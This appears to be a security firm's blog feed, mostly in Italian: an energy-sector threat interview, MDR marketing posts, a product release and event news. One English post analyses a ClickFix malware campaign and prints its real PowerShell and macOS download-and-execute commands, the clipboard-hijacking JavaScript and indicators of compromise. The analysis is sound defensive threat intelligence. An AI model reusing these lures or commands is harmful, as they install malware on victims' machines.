Quali sono oggi le principali minacce informatiche che riguardano le infrastrutture energetiche critiche, come oleodotti, gasdotti e reti elettriche?

Il numero di attacchi riusciti nel settore Energy & Utilities è aumentato di oltre una volta e mezza in cinque anni, dal 2020 al 2024 (fonte Clusit). Ma non solo: le minacce che investono oggi il settore energetico rappresentano un’evoluzione qualitativa oltre che quantitativa. Non si tratta più di attacchi opportunistici, ma di campagne coordinate e multi-vector, condotte da attori con capacità quasi militari e finalità di lungo termine. Il ransomware non è più solo uno strumento di estorsione: nei contesti OT (Operational Technology) può diventare un’arma di sabotaggio capace di bloccare processi fisici e interrompere la continuità operativa. In questo scenario, la convergenza tra IT e OT e la diffusione di tecnologie IoT industriali amplificano la superficie d’attacco, creando una molteplicità di entry point difficilmente governabili con gli approcci tradizionali. Questa evoluzione si inserisce in un contesto geopolitico sempre più complesso, in cui attacchi ransomware e operazioni sponsorizzate da stati – come quelle attribuite a Lazarus Group, CyberAv3ngers, Sandworm Team e Midnight Blizzard – prendono di mira infrastrutture energetiche critiche, dagli oleodotti ai server SCADA fino alle reti PLC. Dal punto di vista della cyber intelligence, il fenomeno più preoccupante resta la persistenza silente: attori ostili che infiltrano le reti, costruiscono accessi privilegiati, mappano sistemi e restano dormienti fino al momento in cui l’impatto operativo e mediatico può essere massimizzato.

Quali sono le conseguenze potenziali di un attacco informatico riuscito su una rete energetica?

Un attacco informatico a un’infrastruttura energetica non ha mai un effetto confinato al dominio digitale: si trasforma rapidamente in un evento fisico, economico e geopolitico. Le possibili conseguenze includono blackout su larga scala, interruzione delle forniture di gas o petrolio, compromissione di sistemi SCADA e DCS, o – nei casi più gravi – danneggiamento fisico degli impianti. Inoltre, l’effetto domino su altri settori critici, come trasporti, servizi di emergenza, logistica o telecomunicazioni, legati tra di loro da interdipendenze operative, è spesso inevitabile con ricadute a cascata su tutte le infrastrutture vitali del Paese.

Dal punto di vista dell’intelligence, questi attacchi rientrano nel paradigma delle minacce ibride, dove la componente cyber è solo un tassello di una strategia più ampia di pressione economica o disinformativa. Un’operazione riuscita contro una rete elettrica può essere utilizzata come leva diplomatica o strumento di coercizione geopolitica. È per questo che la resilienza delle infrastrutture energetiche è sempre più vista come un pilastro della sicurezza nazionale.

Quanto è importante la collaborazione con enti governativi, agenzie di sicurezza e altri operatori del settore per prevenire e rispondere alle minacce cyber?

La collaborazione è la vera chiave di volta della sicurezza cibernetica moderna. Nessuna organizzazione, nemmeno la più strutturata, può disporre di una visibilità completa sul panorama delle minacce. Il valore dell’infosharing è quindi determinante: la condivisione tempestiva di indicatori di compromissione, tattiche e pattern comportamentali consente di anticipare gli attacchi prima che diventino incidenti. In Italia, il legame operativo tra le aziende del settore energetico, l’Agenzia per la Cybersicurezza Nazionale (ACN), il CNAIPIC della Polizia Postale rappresenta un modello consolidato, ma serve estenderlo in una logica cross-border che includa anche ENISA, Europol, NATO CCDCOE e partner industriali internazionali.

L’approccio più efficace resta quello della collective defense, dove la difesa di un attore diventa la difesa dell’intero sistema. Le cyber range e le esercitazioni congiunte – soprattutto interdisciplinari – sono elementi fondamentali per testare la resilienza, validare i playbook di risposta e migliorare il coordinamento tra attori pubblici e privati. In un contesto in cui le minacce evolvono in ore, e non in mesi, la velocità nella diffusione delle informazioni è spesso l’elemento che determina la differenza tra contenere un attacco e subirlo.

Che ruolo può giocare oggi l’intelligenza artificiale nella protezione delle reti energetiche da attacchi informatici?

L’intelligenza artificiale rappresenta un force multiplier per la difesa cibernetica, ma anche un fattore di rischio se mal gestita. Nella cyber threat intelligence, l’IA viene oggi impiegata per l’analisi predittiva, la correlazione massiva di eventi, la rilevazione di anomalie comportamentali e la priorizzazione automatica degli allarmi. Questo permette di passare da modelli di difesa reattiva a paradigmi di difesa predittiva e adattiva, riducendo drasticamente i tempi di detection e migliorando l’accuratezza nel distinguere tra rumore e reale minaccia.

Parallelamente, però, l’IA è sempre più utilizzata anche dagli attori ostili: per automatizzare campagne di spear phishing, generare deepfake credibili, creare malware autoevolutivi o orchestrare attacchi mirati con logiche di decision loop autonomo. La sfida è quindi duplice: sfruttare l’IA per rafforzare la protezione, ma anche difendersi dall’IA offensiva. Ciò richiede investimenti in algoritmi explainable, per rendere trasparenti e comprensibili le decisioni e i risultati prodotti dai modelli di intelligenza artificiale e capacità umane di supervisione. Alla base deve esserci un principio etico: la sovranità sui dati e sugli algoritmi è ormai parte integrante della sovranità digitale e, quindi, della sicurezza nazionale.

Quali investimenti state facendo in cybersecurity e quali sono le priorità strategiche per i prossimi anni?

La transizione energetica e la trasformazione digitale stanno ridefinendo il paradigma industriale, esponendo le infrastrutture energetiche a nuove vulnerabilità e minacce cyber sempre più sofisticate, amplificate da dinamiche geopolitiche instabili. In questo scenario, la cybersecurity non può più essere considerata una funzione tecnica isolata, ma deve essere integrata nella governance strategica dell’azienda e nella gestione della supply chain energetica.

La catena delle forniture rappresenta oggi uno degli elementi più sensibili e strategici per la sicurezza del settore energetico. La crescente interconnessione tra operatori, fornitori e partner tecnologici genera nuove superfici di attacco, dove una singola vulnerabilità può propagarsi rapidamente lungo tutta la filiera, mettendo a rischio la continuità operativa e la resilienza dell’intero sistema. Per rispondere a queste sfide, Eni ha adottato un modello organizzativo “glocal”, con una governance centrale forte e una presenza locale capillare, che consente di monitorare costantemente gli asset IT e OT. In questo contesto, la cyber intelligence di Eni svolge un ruolo proattivo e centrale: non si limita a reagire agli attacchi, ma lavora per anticiparli grazie a modelli predittivi sviluppati internamente e alla collaborazione con istituzioni e partner privati. L’analisi continua delle minacce e delle vulnerabilità lungo la supply chain permette di identificare tempestivamente i rischi emergenti, rafforzando la postura difensiva dell’azienda e garantendo la continuità operativa anche in scenari di crisi. Per questo Eni ha inserito il rischio cyber tra i principali rischi aziendali, gestendolo con strumenti avanzati e una valutazione integrata nel processo di risk management, estesa anche ai fornitori strategici.

Per rafforzare ulteriormente questa strategia, Eni investe costantemente in programmi di sensibilizzazione e formazione che coinvolgono tutti i livelli aziendali e i partner della filiera, promuovendo una cultura della sicurezza diffusa e consapevole. Simulazioni di phishing, corsi online e campagne di comunicazione contribuiscono concretamente a ridurre il rischio e a rafforzare la capacità di risposta. In ultima analisi, oggi è chiaro che la cybersecurity non rappresenta più un costo, ma un fattore abilitante di resilienza e vantaggio competitivo. Questa consapevolezza guida la nostra strategia per i prossimi anni: proteggere le infrastrutture energetiche significa, sempre più, proteggere la tenuta economica e sociale del Paese e la stabilità del suo futuro energetico.

Dal SOC alla boardroom

Pier Giorgio Bergonzi, Product Marketing — Thu, 15 Jan 2026 23:00:00 GMT

Per molto tempo l’MDR è stato raccontato esclusivamente come un servizio operativo: monitoraggio continuo, threat hunting, risposta agli incidenti. Tutto corretto. Ma oggi, per molti CISO, non è più sufficiente.

Il problema non è solo vedere cosa accade. Il problema è decidere: cosa è davvero prioritario, cosa richiede un’azione immediata, cosa può essere gestito nel tempo — e soprattutto come spiegare queste scelte a chi governa l’azienda.

In questo scenario, un MDR maturo non è solo una funzione di sicurezza. È una funzione che riduce l’incertezza decisionale.

Quando la sicurezza genera dati, ma non chiarezza

Le organizzazioni dispongono di più strumenti di sicurezza che mai. I dati non mancano: alert, log, eventi, report. Eppure, quando arriva il momento di prendere una decisione — tecnica o strategica — emerge spesso una difficoltà concreta:

Questo non è solo un tema operativo. È un tema di chiarezza e tempestività nelle decisioni.

Un MDR efficace non serve semplicemente a reagire più velocemente. Serve a capire prima cosa sta succedendo davvero.

MDR come punto di riferimento per le decisioni di sicurezza

Molte roadmap di sicurezza nascono da framework, linee guida, requisiti normativi. Sono strumenti fondamentali, ma spesso scollegati dalla realtà quotidiana dell’organizzazione.

Un MDR ben progettato introduce un cambio di prospettiva: porta la sicurezza dal piano teorico a quello osservabile.

Nel tempo, il servizio MDR diventa un punto di riferimento perché consolida:

segnali ricorrenti e pattern di attacco reali;
aree dell’infrastruttura che attirano maggiore attenzione;
controlli che esistono, ma che nella pratica mostrano limiti evidenti.

Questo consente al CISO di spostare il baricentro delle decisioni: dalle priorità “per principio” alle priorità basate su ciò che l’organizzazione sta realmente affrontando.

Oggi le dinamiche di attacco si sviluppano con una rapidità incompatibile con processi decisionali lenti o frammentati. Quando i segnali si accumulano senza essere interpretati, il rischio non è solo “non vedere”, ma decidere troppo tardi o nel punto sbagliato.

In questo contesto, la capacità di capire rapidamente dove intervenire e perché diventa più rilevante dell’aggiungere nuovi livelli di complessità tecnologica.

Oltre il rilevamento e la risposta

Uno dei limiti più comuni nella governance della sicurezza è la distanza tra ciò che viene osservato operativamente e ciò che viene discusso a livello decisionale.

Un MDR d’élite colma questo divario perché non si limita a descrivere singoli eventi, ma consente di:

osservare l’evoluzione delle esposizioni nel tempo;
distinguere segnali isolati da dinamiche persistenti;
capire quali aree continuano a richiedere attenzione, anche dopo interventi correttivi.

In questo modo, la sicurezza smette di essere una sequenza di incidenti scollegati e diventa una lettura continua di ciò che merita di essere governato.

Scenario: il giorno dopo l’incidente

Un incidente è stato contenuto. Non ci sono stati impatti gravi sulla continuità operativa. Il peggio sembra passato. Il giorno dopo, il board chiede un confronto.

Le domande non sono tecniche:

Come è potuto accadere?
Siamo esposti allo stesso modo oggi?
Cosa cambia, concretamente, da questo momento in poi?

È in questo momento che emerge il vero valore dell’MDR. Un MDR puramente operativo fornisce una timeline tecnica.

Un MDR orientato al decision enablement fornisce:

il contesto dell’attacco rispetto a segnali già osservati in precedenza;
una visione chiara di ciò che è stato contenuto e di ciò che continua a richiedere attenzione e presidio;
gli elementi per spiegare quali decisioni sono state prese e su quali basi.

Non è una questione di comunicazione. È una questione di responsabilità e governance.

Dal SOC alla boardroom: quando l’MDR diventa linguaggio comune

Il board non ha bisogno di dettagli tecnici. Ha bisogno di capire se l’organizzazione sta migliorando o peggiorando la propria capacità di gestire le minacce.

Gli output MDR che funzionano davvero a livello executive sono quelli che:

mostrano trend, non solo istantanee;
collegano eventi a potenziali impatti;
rendono esplicite le scelte fatte e le aree che richiedono ancora miglioramenti.

Nella pratica, molte organizzazioni sperimentano ancora un limite evidente: report di sicurezza tecnicamente accurati, ma poco utili quando si tratta di prendere decisioni di governance. Il punto non è produrre più report, ma trasformare segnali operativi in informazioni comprensibili, contestualizzate e azionabili per chi ha responsabilità di governance.

In questo senso, l’MDR diventa un abilitatore: traduce segnali operativi in informazioni utilizzabili per decidere.

MDR come estensione del ruolo del CISO

Un MDR maturo non si limita a reagire agli eventi. È progettato per intercettare, comprendere e governare ciò che accade, mantenendo il controllo anche nelle situazioni più complesse.

Fornisce qualcosa di più realistico e più utile: consapevolezza operativa continua. Riduce l’ambiguità. Fornisce contesto. Permette al CISO di spiegare non solo cosa è successo, ma cosa continua a richiedere attenzione, perché determinate scelte sono state fatte e perché è necessario attuarne delle nuove.

L’MDR che fa davvero la differenza

Il valore reale di un MDR oggi non si misura solo in:

incidenti rilevati,
tempi di risposta,
volumi di alert gestiti.

Si misura nella qualità delle decisioni che abilita. Nella capacità di portare chiarezza quando serve decidere.

E nella solidità con cui il CISO può sostenere quelle decisioni, anche nei momenti più delicati. È lì che l’MDR smette di essere un servizio operativo e diventa una funzione strategica.

IntelOwl 6.5.0

Pier Giorgio Bergonzi, Product Marketing — Thu, 08 Jan 2026 23:00:00 GMT

Siamo lieti di annunciare il rilascio di IntelOwl 6.5.0, la nuova release della piattaforma open source di Threat Intelligence Investigation, integrata nell’ecosistema applicativo proprietario di Certego, che continua a evolversi anche grazie al contributo della community internazionale.

La release introduce un importante aggiornamento dell’interfaccia utente e arriva in un momento significativo per il progetto, che ha recentemente superato le 4.500 “stars” su GitHub, confermandosi come uno dei progetti open source più apprezzati nel panorama della cyber threat intelligence.

Il ruolo di IntelOwl in Certego

IntelOwl è integrata nativamente con la piattaforma di Unified Security Operations PanOptikon® e con l’ecosistema applicativo proprietario di Certego, rappresentando uno strumento fondamentale per le attività quotidiane degli analisti Certego. Grazie a questa integrazione, gli analisti possono contare su un sistema di Threat Intelligence ad alta precisione e affidabilità, che consente di:

monitorare e validare in tempo reale gli indicatori di compromissione (IOC);
svolgere analisi approfondite su domini, file, IP, hash e altri osservabili;
correlare evidenze tecniche e conoscenze umane in un unico flusso operativo integrato.

Nuova UI per Artifacts / Analyzables

Tra le principali novità della versione 6.5 spicca l’aggiornamento dell’interfaccia utente, che introduce una nuova pagina dedicata agli “Artifacts”, detti anche “Analyzables”. Gli analyzables rappresentano un observable o un sample utilizzato durante le attività di analisi. Grazie a questa nuova sezione della UI, è ora possibile:

salvare le valutazioni associate a ciascun observable o sample
fare in modo che queste valutazioni contribuiscano ai risultati delle analisi

Un aggiornamento che rende l’interfaccia più completa e allineata alle esigenze operative di chi utilizza IntelOwl quotidianamente per attività di investigation e threat intelligence.

Una community in continua crescita

Il superamento delle 4.500 stelle su GitHub rappresenta un ulteriore riconoscimento del valore di IntelOwl come progetto open source, utilizzato e supportato da analisti e team di sicurezza in tutto il mondo. Per il dettaglio completo delle modifiche introdotte con la versione 6.5 è possibile consultare il changelog ufficiale sul repository GitHub di IntelOwl.

I cyber attacchi non vanno in vacanza

Pier Giorgio Bergonzi, Product Marketing — Wed, 17 Dec 2025 23:00:00 GMT

Natale è il momento dell’anno in cui rallentiamo, stacchiamo la spina e ci concediamo qualche giorno di meritato riposo.

Uffici più vuoti, team ridotti, ritmi meno serrati.

Ma mentre molti staccano, i cyber criminali no!

Anzi, le festività sono spesso uno dei periodi preferiti per colpire: meno presidi, tempi di risposta più lunghi e un’attenzione inevitabilmente più bassa rendono le aziende un bersaglio più facile.

Le festività: un momento critico per la sicurezza

Durante le vacanze natalizie cambiano le abitudini operative delle aziende:

personale IT ridotto o in ferie
minore presidio dei sistemi
maggiore utilizzo di accessi remoti

È proprio in questi contesti che un incidente di sicurezza può trasformarsi rapidamente in un problema serio, soprattutto se non viene rilevato e gestito tempestivamente. Un attacco che passa inosservato per ore o giorni può causare:

interruzioni operative
perdita o compromissione dei dati
impatti economici e reputazionali
difficoltà nel ripristino dei sistemi

<br>

Perché la sicurezza non può fermarsi

La sicurezza informatica non è un’attività “a orario d’ufficio”. Le minacce sono continue, automatizzate e spesso progettate per sfruttare proprio i momenti di minore attenzione. Per questo motivo è fondamentale garantire:

monitoraggio costante dell’infrastruttura
capacità di rilevare tempestivamente comportamenti anomali
intervento rapido in caso di incidente

Anche – e soprattutto – quando l’azienda è chiusa per le festività.

MDR: la protezione continua che non si ferma mai

Un servizio di Managed Detection and Response (MDR) nasce proprio per rispondere a questa esigenza: garantire una protezione costante dei sistemi informativi, indipendentemente dalla presenza del team IT interno.

Anche durante le festività, mentre l’operatività rallenta e le risorse sono ridotte, un servizio MDR combina tecnologie di monitoraggio avanzate e competenze specialistiche attive 24/7 per individuare e contenere tempestivamente le minacce, riducendo al minimo gli impatti sul business.

Monitoraggio continuo, 24 ore su 24

Il Security Operations Center di Certego è composto da specialisti senior con competenze eterogenee e certificazioni riconosciute a livello internazionale. Grazie alla piattaforma proprietaria di Unified Security Operations PanOptikon®, i servizi MDR di Certego assicurano una sorveglianza continua sull’intera infrastruttura aziendale.

PanOptikon® integra sonde e agenti a livello di rete, endpoint e ambienti cloud, monitorando in tempo reale il traffico e analizzando i dati telemetrici per individuare comportamenti anomali o segnali di compromissione.

Ogni evento sospetto viene analizzato dal team di Security Operations per:

comprenderne l’origine
verificarne l’effettiva pericolosità
definire la strategia di risposta più efficace

Con l’obiettivo di ridurre al minimo la finestra di esposizione e mantenere un livello di protezione sempre elevato.

Incident Response: quando conta davvero la rapidità

Rilevare un attacco è fondamentale, ma è la qualità della risposta a fare la differenza.

In caso di incidente, il Rapid Incident Response Team di Certego interviene seguendo procedure strutturate, testate e costantemente aggiornate, basate sui principali modelli operativi internazionali, come il MITRE ATT&CK Framework.

L’approccio prevede:

intervento immediato, per contenere e neutralizzare la minaccia
riduzione del downtime, preservando la continuità operativa
analisi post-incidente, anche tramite attività di digital forensics, per individuare le cause e prevenire eventi simili in futuro

Un supporto concreto, pensato per accompagnare l’azienda anche nei momenti più critici.

Un Natale più sicuro, anche per l’IT

Scegliere un servizio di Managed Detection and Response significa poter affrontare le festività con maggiore serenità, sapendo che la sicurezza resta sotto controllo, anche quando l’ufficio è vuoto. Mentre tutti staccano, la cybersecurity resta accesa. E con i servizi MDR di Certego, la tua azienda può contare su una protezione continua, affidabile e sempre attiva — anche a Natale.

Malware Analysis

Sun, 07 Dec 2025 23:00:00 GMT

Introduction

ClickFix is a well-known social-engineering technique that leads users to compromise themselves by pasting and executing a malicious command in the terminal of their operating system. In recent weeks, our Security Operations Team has directly observed this campaign being actively used, further confirming its relevance and real-world impact. As highlighted in several analyses by Joe Security and other researchers, this threat continues to evolve in its themes, delivery methods, and level of sophistication, remaining a highly effective attack vector even today.

Starting from an initial finding shared by @BlinkzSec, our Threat Intelligence team expanded the investigation based on the data surfaced by our SecOps Team and identified several new domains linked to the ClickFix operation, which appears to be still ongoing. The analysis also revealed pages delivering OS-specific payloads targeting both Windows and macOS users. Based on multiple indicators, we believe with a high degree of confidence that these components were vibe-coded by a Russian-speaking operator.

Starting point

In this campaign the user is presented with the ClickFix lure: a blurred page displaying a fake verification in the background with a banner that mimics legitimate CAPTCHA challenge.

By pressing the button the user is presented with some instructions to follow in order to "verify" its request.

These instruction automatically copy in the victim's clipboard the payload for another stage

powershell -wind mi -Enc JAByAD0AJwBkAG8AdwAgAHkAbwB1AHIAZgBpACcAOwAuACcAaQBlAHgAJwAoACYAKAAkAHIAWwA5AF0AKwAkAHIAWwAyAF0AKwAkAHIAWwA3AF0AKQAgAGgAdAB0AHAAcwA6AC8ALwBrAGoAYQByAHoALgBjAG8AbQAvAGoALgB0AHgAdAApAC4AQwBvAG4AdABlAG4AdAA=

Decoding the Base64 coded text we obtain a web request to another page on the same domain, containing a text file

$r='dow yourfi';.'iex'(&($r[9]+$r[2]+$r[7]) https://kjarz.com/j.txt).Content

The file j.txt contains an obfuscated PowerShell script whose purpose is to download the file named BMUAUFKZ.msi on the same domain. This file has been identified as HijackLoader malware family. From VirusTotal relation page, this sample is contacting IP 212.11.64.95, possibly it's C2 server located in SC and with many other communicating files with high detection rate. This can be a sign of an wider and extended operation carried out by the Threat Actor: https://www.virustotal.com/gui/ip-address/212.11.64.95/relations

Furthermore, the root page of the domain has an open directory, enabling us to access everything from the page, including the ClickFix source code named uri.html.

The directory seems to host also another variant of HijackLoader, named `MRXTOHRL.msi`.

Web page

The HTML source page itself is fairly common in this kind of attack: it contains a JavaScript code whose main purpose is to dynamically decode and build the malicious web page. The loaded page loads the images and hosts the payload shown above, manipulating user clipboard.

function copyToClipboard() {
navigator.clipboard.writeText
                ("powershell -wind mi -Enc JAByAD0AJwBkAG8AdwAgAHkAbwB1AHIAZgBpACcAOwAuACcAaQBlAHgAJwAoACYAKAAkAHIAWwA5AF0AKwAkAHIAWwAyAF0AKwAkAHIAWwA3AF0AKQAgAGgAdAB0AHAAcwA6AC8ALwBrAGoAYQByAHoALgBjAG8AbQAvAGoALgB0AHgAdAApAC4AQwBvAG4AdABlAG4AdAA=");
    }

Pivoting

The malicious page is hosted on IP address 88.214.50.121, a Russian IP address part of AS 216341, OPTIMA LLC. Pivoting on the IP address that is hosting the domain, we discovered a wider ClickFix Booking.com themed campaign.

hxxps[:]//account-captcha-id4234[.cfd/uri.html
hxxps[:]//account-bookscaptcha[.com/uri.html
hxxps[:]//account-bookextranet[.icu/uri.html
hxxps[:]//account-bookcaptcha[.com/uri.html
hxxps[:]//account-bookcaptcha[.cfd/uri.html
hxxps[:]//account-extranetcaptchapulse[.com/uri.html
https[:]//account-extranetpulser[.com/uri.html
hxxps[:]//account-extrapulse[.cfd/uri.html

Another variant: OS specific payload

One domain in particular caught our attention: hxxps[:]//account-extracaptcha[.com/uri.html Despite being visually nearly identical to other pages in the campaign, it has a different source code, aiming to a winder audience. In fact, the JavaScript code of this page looks for the operating system of the user, displaying a different page if the user is accessing through MacOS or Windows:

	// Функция для определения операционной системы|
	function getOS() {
		const userAgent = navigator.userAgent.toLowerCase();
		if (userAgent.includes('win')) return 'windows';
		if (userAgent.includes('mac')) return 'mac';
		return 'other';
	}
	
	// [...]
	
    // Альтернативный подход - перехват события отправки формы
    function interceptFormSubmission() {
        document.addEventListener('submit', function(e) {
            // Проверяем, связано ли событие с CAPTCHA
            if (e.target.closest('awswaf-captcha')) {
                e.preventDefault();
                e.stopPropagation();

                const os = getOS();

                if (os === 'windows') {
                    window.location.href = 'uri.html';
                } else if (os === 'mac') {
                    createMacInstructionModal();
                } else {
                    window.location.href = '/';
                }
            }
        });
    }

Notice the code comment in Russian language, meaning "Alternative approach – intercepting the form submission event." Near this comment we can find other russian comments saying things like "Additional click handler", "Run both approaches for reliability.", "Add the Booking.com header as in the example" and "Function to create a modal window with instructions for Mac (as in the example)". This is a clear indicator of usage of LLM in writing the webpage and of a debug and improvement cycle during the development.

This particular page seems to target also MacOS users by copying this string in their clipboard, ready to be executed.

echo \'ZWNobyAnVmVyaWZpY2F0aW9uIHBsZWFzZSB3YWl0Li4uJyAmJiBjdXJsIC1zIC1rICdodHRwczovL2RlZmF1bHRnYXRlLnNwYWNlL2N1cmwvMzVkNGRkNzc3MTkxNjkxZWY0OWMxNjNlYTBlMjJkYTZjMjAwYjU3YzMwYzA1OTc4YmU3YWJmNmRlMGE0MDU2YScgLW8gL3RtcC9sYXVuY2ggJiYgY2htb2QgK3ggL3RtcC9sYXVuY2ggJiYgL3RtcC9sYXVuY2g=\' | base64 -d | bash

Decoded into

echo 'Verification please wait...' && curl -s -k 'https://defaultgate.space/curl/35d4dd777191691ef49c163ea0e22da6c200b57c30c05978be7abf6de0a4056a' -o /tmp/launch && chmod +x /tmp/launch && /tmp/launch

If the page is being navigated from a Windows machine, the payload that gets copied is

powershell -wi mi -Enc LgAnAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAnACgAdwBnAGUAdAAgAC0AdQBzAGUAYgBhAHMAaQBjACAAaAB0AHQAcABzADoALwAvAGoAcQBxAGkAYwBlAC4AYwBvAG0ALwBtAC4AdAB4AHQAKQAuAEMAbwBuAHQAZQBuAHQA

Decoded into

.'Invoke-Expression'(wget -usebasic https://jqqice.com/m.txt).Content

Unluckily, at the time of writing the both pages has been taken down, so we can't confirm what was going to be downloaded on victim machines.

IOCs

At the end of our investigation, the Certego Threat Intelligence Team identified a set of Indicators of Compromise (IOCs) associated with the ClickFix operation observed in recent weeks. These artifacts include malicious file hashes, URLs used to deliver the payloads, and IP addresses linked to the campaign’s infrastructure.

Hashes

8986d305ceed84c8dbc430ae7caf31b645f22fe5c4c29bca869eaee9abc46585  BMUAUFKZ.msi
dab70bc2d883a287e4dc3c468dc98ced3eccd19c14fc267c1979613f721632b3  index.txt
086d9294348d95feb9f740db515f9708d2ab76cfa15815b7c7f79122932900de  j.txt
ba8f2313b3398187c424d9abed5f735907d01ebc9a11077136d2919e369501d6  MRXTOHRL.msi
0ccf7e387d851eb26bbc7d1895dab427d9cc392916523f5d06ba64a16fdbd616  uri.html

fbb7ca141535f13ca986f27d93151bc224dfece1ec2100bbab0a943b69a19aec  DWKNANVH.msi

URL

hxxps[:]//kjarz.[com/uri.html
hxxps[:]//kjarz.[com/j.txt
hxxps[:]//kjarz.[com/MRXTOHRL.msi
hxxps[:]//kjarz.[com/BMUAUFKZ.msi

hxxps[:]//account-captcha-id4234[.cfd/uri.html
hxxps[:]//77.90.60.32/j.txt
hxxps[:]//kirgr[.com/DWKNANVH.msi
hxxps[:]//account-bookscaptcha[.com/uri.html
hxxps[:]//account-bookextranet[.icu/uri.html
hxxps[:]//account-bookcaptcha[.com/uri.html
hxxps[:]//account-bookcaptcha[.cfd/uri.html
hxxps[:]//account-extranetcaptchapulse[.com/uri.html
https[:]//account-extranetpulser[.com/uri.html
hxxps[:]//account-extrapulse[.cfd/uri.html
hxxps[:]//icejqq[.com/jj.txt
hxxps[:]//icejqq[.com/j.txt

hxxps[:]//account-extracaptcha[.com/uri.html
hxxps[:]//defaultgate[.space/curl/35d4dd777191691ef49c163ea0e22da6c200b57c30c05978be7abf6de0a4056a  # MacOS-specific payload
hxxps[:]//jqqice[.com/m.txt  # Windows-specific payload

IP

88.214.50.121 # Hosting IP
212.11.64.95  # HijackLoader C2

Conclusions

The ClickFix campaign analyzed in recent weeks once again demonstrates how threat actors continue to invest in social-engineering techniques that are simple yet highly effective, capable of targeting both Windows and macOS users through increasingly polished deception mechanisms. The elements uncovered — new infrastructure, OS-specific payloads, and clear iterative development patterns — indicate that this operation remains active and continuously evolving.

At Certego, we will continue to closely monitor this and other related campaigns, constantly expanding our visibility and updating our detection capabilities to promptly identify any new variants or infrastructure leveraged by the threat actor. Any significant developments will be shared through our Threat Intelligence channels and on the company blog.

Certego a Sky TG24

Pier Giorgio Bergonzi, Product Marketing — Sun, 07 Dec 2025 23:00:00 GMT

Domenica 7 dicembre siamo stati protagonisti di Progress, il programma di Sky TG24 dedicato all’innovazione, alla tecnologia e alla trasformazione digitale. Al minuto 24:15 del programma, disponibile a questo link, abbiamo avuto l’occasione di raccontare davanti alle telecamere ciò che ogni giorno facciamo dietro le quinte: proteggere aziende e infrastrutture dagli attacchi informatici, in un contesto in cui la rapidità e la precisione della risposta fanno la differenza.

A intervenire ai microfoni di Giovanni Mirenna sono stati Bernardino Grignaffini Gregorio, CEO e CO-Founder di Certego, e Marco Giovanetti, Security Operations Manager di Certego, che hanno illustrato il cuore del nostro modello di cybersecurity: un approccio che unisce competenze specialistiche, esperienza operativa e tecnologie proprietarie sviluppate internamente.

Condividere la nostra visione in un contesto autorevole come Sky TG24 rappresenta un riconoscimento concreto dell’impegno che ogni giorno dedichiamo alla protezione del sistema produttivo del Paese.

Allenarsi alla crisi

Pier Giorgio Bergonzi, Product Marketing — Mon, 17 Nov 2025 23:00:00 GMT

Perché oggi un esercizio tabletop di cybersecurity?

Nel panorama attuale, gli attacchi informatici non sono più eventi rari o circoscritti a pochi settori: sono costanti, evoluti e mettono in discussione non solo le difese tecniche, ma anche i processi, la comunicazione e i ruoli aziendali. Per questo motivo, sempre più CISO, IT Manager e responsabili della sicurezza informatica di diversi settori scelgono di mettersi alla prova insieme, partecipando a esercizi di tipo tabletop per confrontarsi su come affrontare un incidente informatico, condividere esperienze e imparare dagli approcci di chi opera in contesti diversi.

Un tabletop è una simulazione di scenario: si parte da un attacco ipotetico — un ransomware, una compromissione della supply chain, una fuga di dati — e si analizzano passo dopo passo le decisioni da prendere. È un momento in cui professionisti che condividono lo stesso ruolo, ma lavorano in settori diversi, si siedono allo stesso tavolo e si chiedono: _ “Cosa faremmo se capitasse a noi? Chi chiameremmo? Come gestiremmo la comunicazione? Chi decide cosa, e quando?” _

In questo confronto tra pari, ma con esperienze e prospettive differenti, nasce il valore più grande dell’esercizio: la possibilità di osservare come altri, con le stesse responsabilità, affrontano problemi simili da angolazioni diverse.

Questo tipo di esercizio è ormai riconosciuto come una pratica fondamentale di resilienza operativa: la Digital Operational Resilience Act (DORA) lo cita come strumento per testare la capacità di risposta agli incidenti.

Ma, al di là del riferimento normativo, per chi guida la sicurezza in azienda un tabletop è soprattutto un’opportunità: passare dal “abbiamo un piano scritto” al “abbiamo messo quel piano alla prova, lo abbiamo discusso, abbiamo scoperto nuovi spunti e idee”. Ed è proprio dal confronto con gli altri — con chi vive le stesse responsabilità ma in contesti diversi — che emergono le intuizioni più utili. Perché spesso non si tratta solo di sapere cosa fare, ma di capire come gli altri prendono decisioni sotto pressione.

Un’occasione di formazione “reale”

Partecipare a un tabletop non è un esercizio teorico: è una vera esperienza di formazione sul campo. Ogni partecipante porta con sé il proprio bagaglio tecnico e decisionale, ma viene messo nella condizione di confrontarsi con chi svolge lo stesso ruolo in altri settori, magari con vincoli, processi e risorse completamente diversi. È un confronto tra pari livello, ma con esperienze differenti: chi lavora nella manifattura ragiona in termini di continuità operativa, chi opera nel finance mette al centro la compliance, chi lavora nell’healthcare dà priorità alla protezione dei dati personali.

Questo scambio di prospettive genera apprendimento concreto. Ci si accorge che le sfide possono essere comuni, ma le risposte cambiano in base al contesto. E proprio in questa varietà si trovano idee, approcci e soluzioni che possono essere adattati alla propria realtà. Il tabletop, in questo senso, diventa un laboratorio di contaminazione positiva: un luogo in cui si mettono alla prova procedure e persone, ma anche un’occasione per ampliare la visione di cosa significa gestire una crisi informatica.

Ogni partecipante esce dall’esperienza con qualcosa di nuovo: una consapevolezza, una domanda, un’intuizione. È formazione esperienziale nel senso più autentico: non si impara leggendo o ascoltando, ma facendo, discutendo, condividendo.

Cosa ti porti a casa dopo averlo fatto

Un tabletop non si chiude quando termina la simulazione: è da quel momento che inizia il vero valore. Il giorno dopo, se sei un CISO o un IT Manager, torni in ufficio con una prospettiva più ampia, arricchita dal confronto con chi vive le tue stesse responsabilità in contesti diversi. Non si tratta di scoprire errori o mancanze, ma di guardare la tua esperienza da un’altra prospettiva, mettendo in discussione le abitudini e rileggendo i tuoi processi alla luce di nuove idee.

Quello che hai ascoltato dai tuoi colleghi di altri settori ti aiuta a misurare la tua maturità, a individuare spazi di miglioramento e a trovare nuove modalità per rendere la tua organizzazione più pronta e più coordinata. Scopri che molte difficoltà sono comuni — la gestione dei tempi, la chiarezza dei ruoli, la comunicazione interna — e che alcune soluzioni semplici possono davvero fare la differenza. In questo modo, il tabletop smette di essere una simulazione e diventa uno strumento concreto di crescita professionale e di sviluppo della leadership.

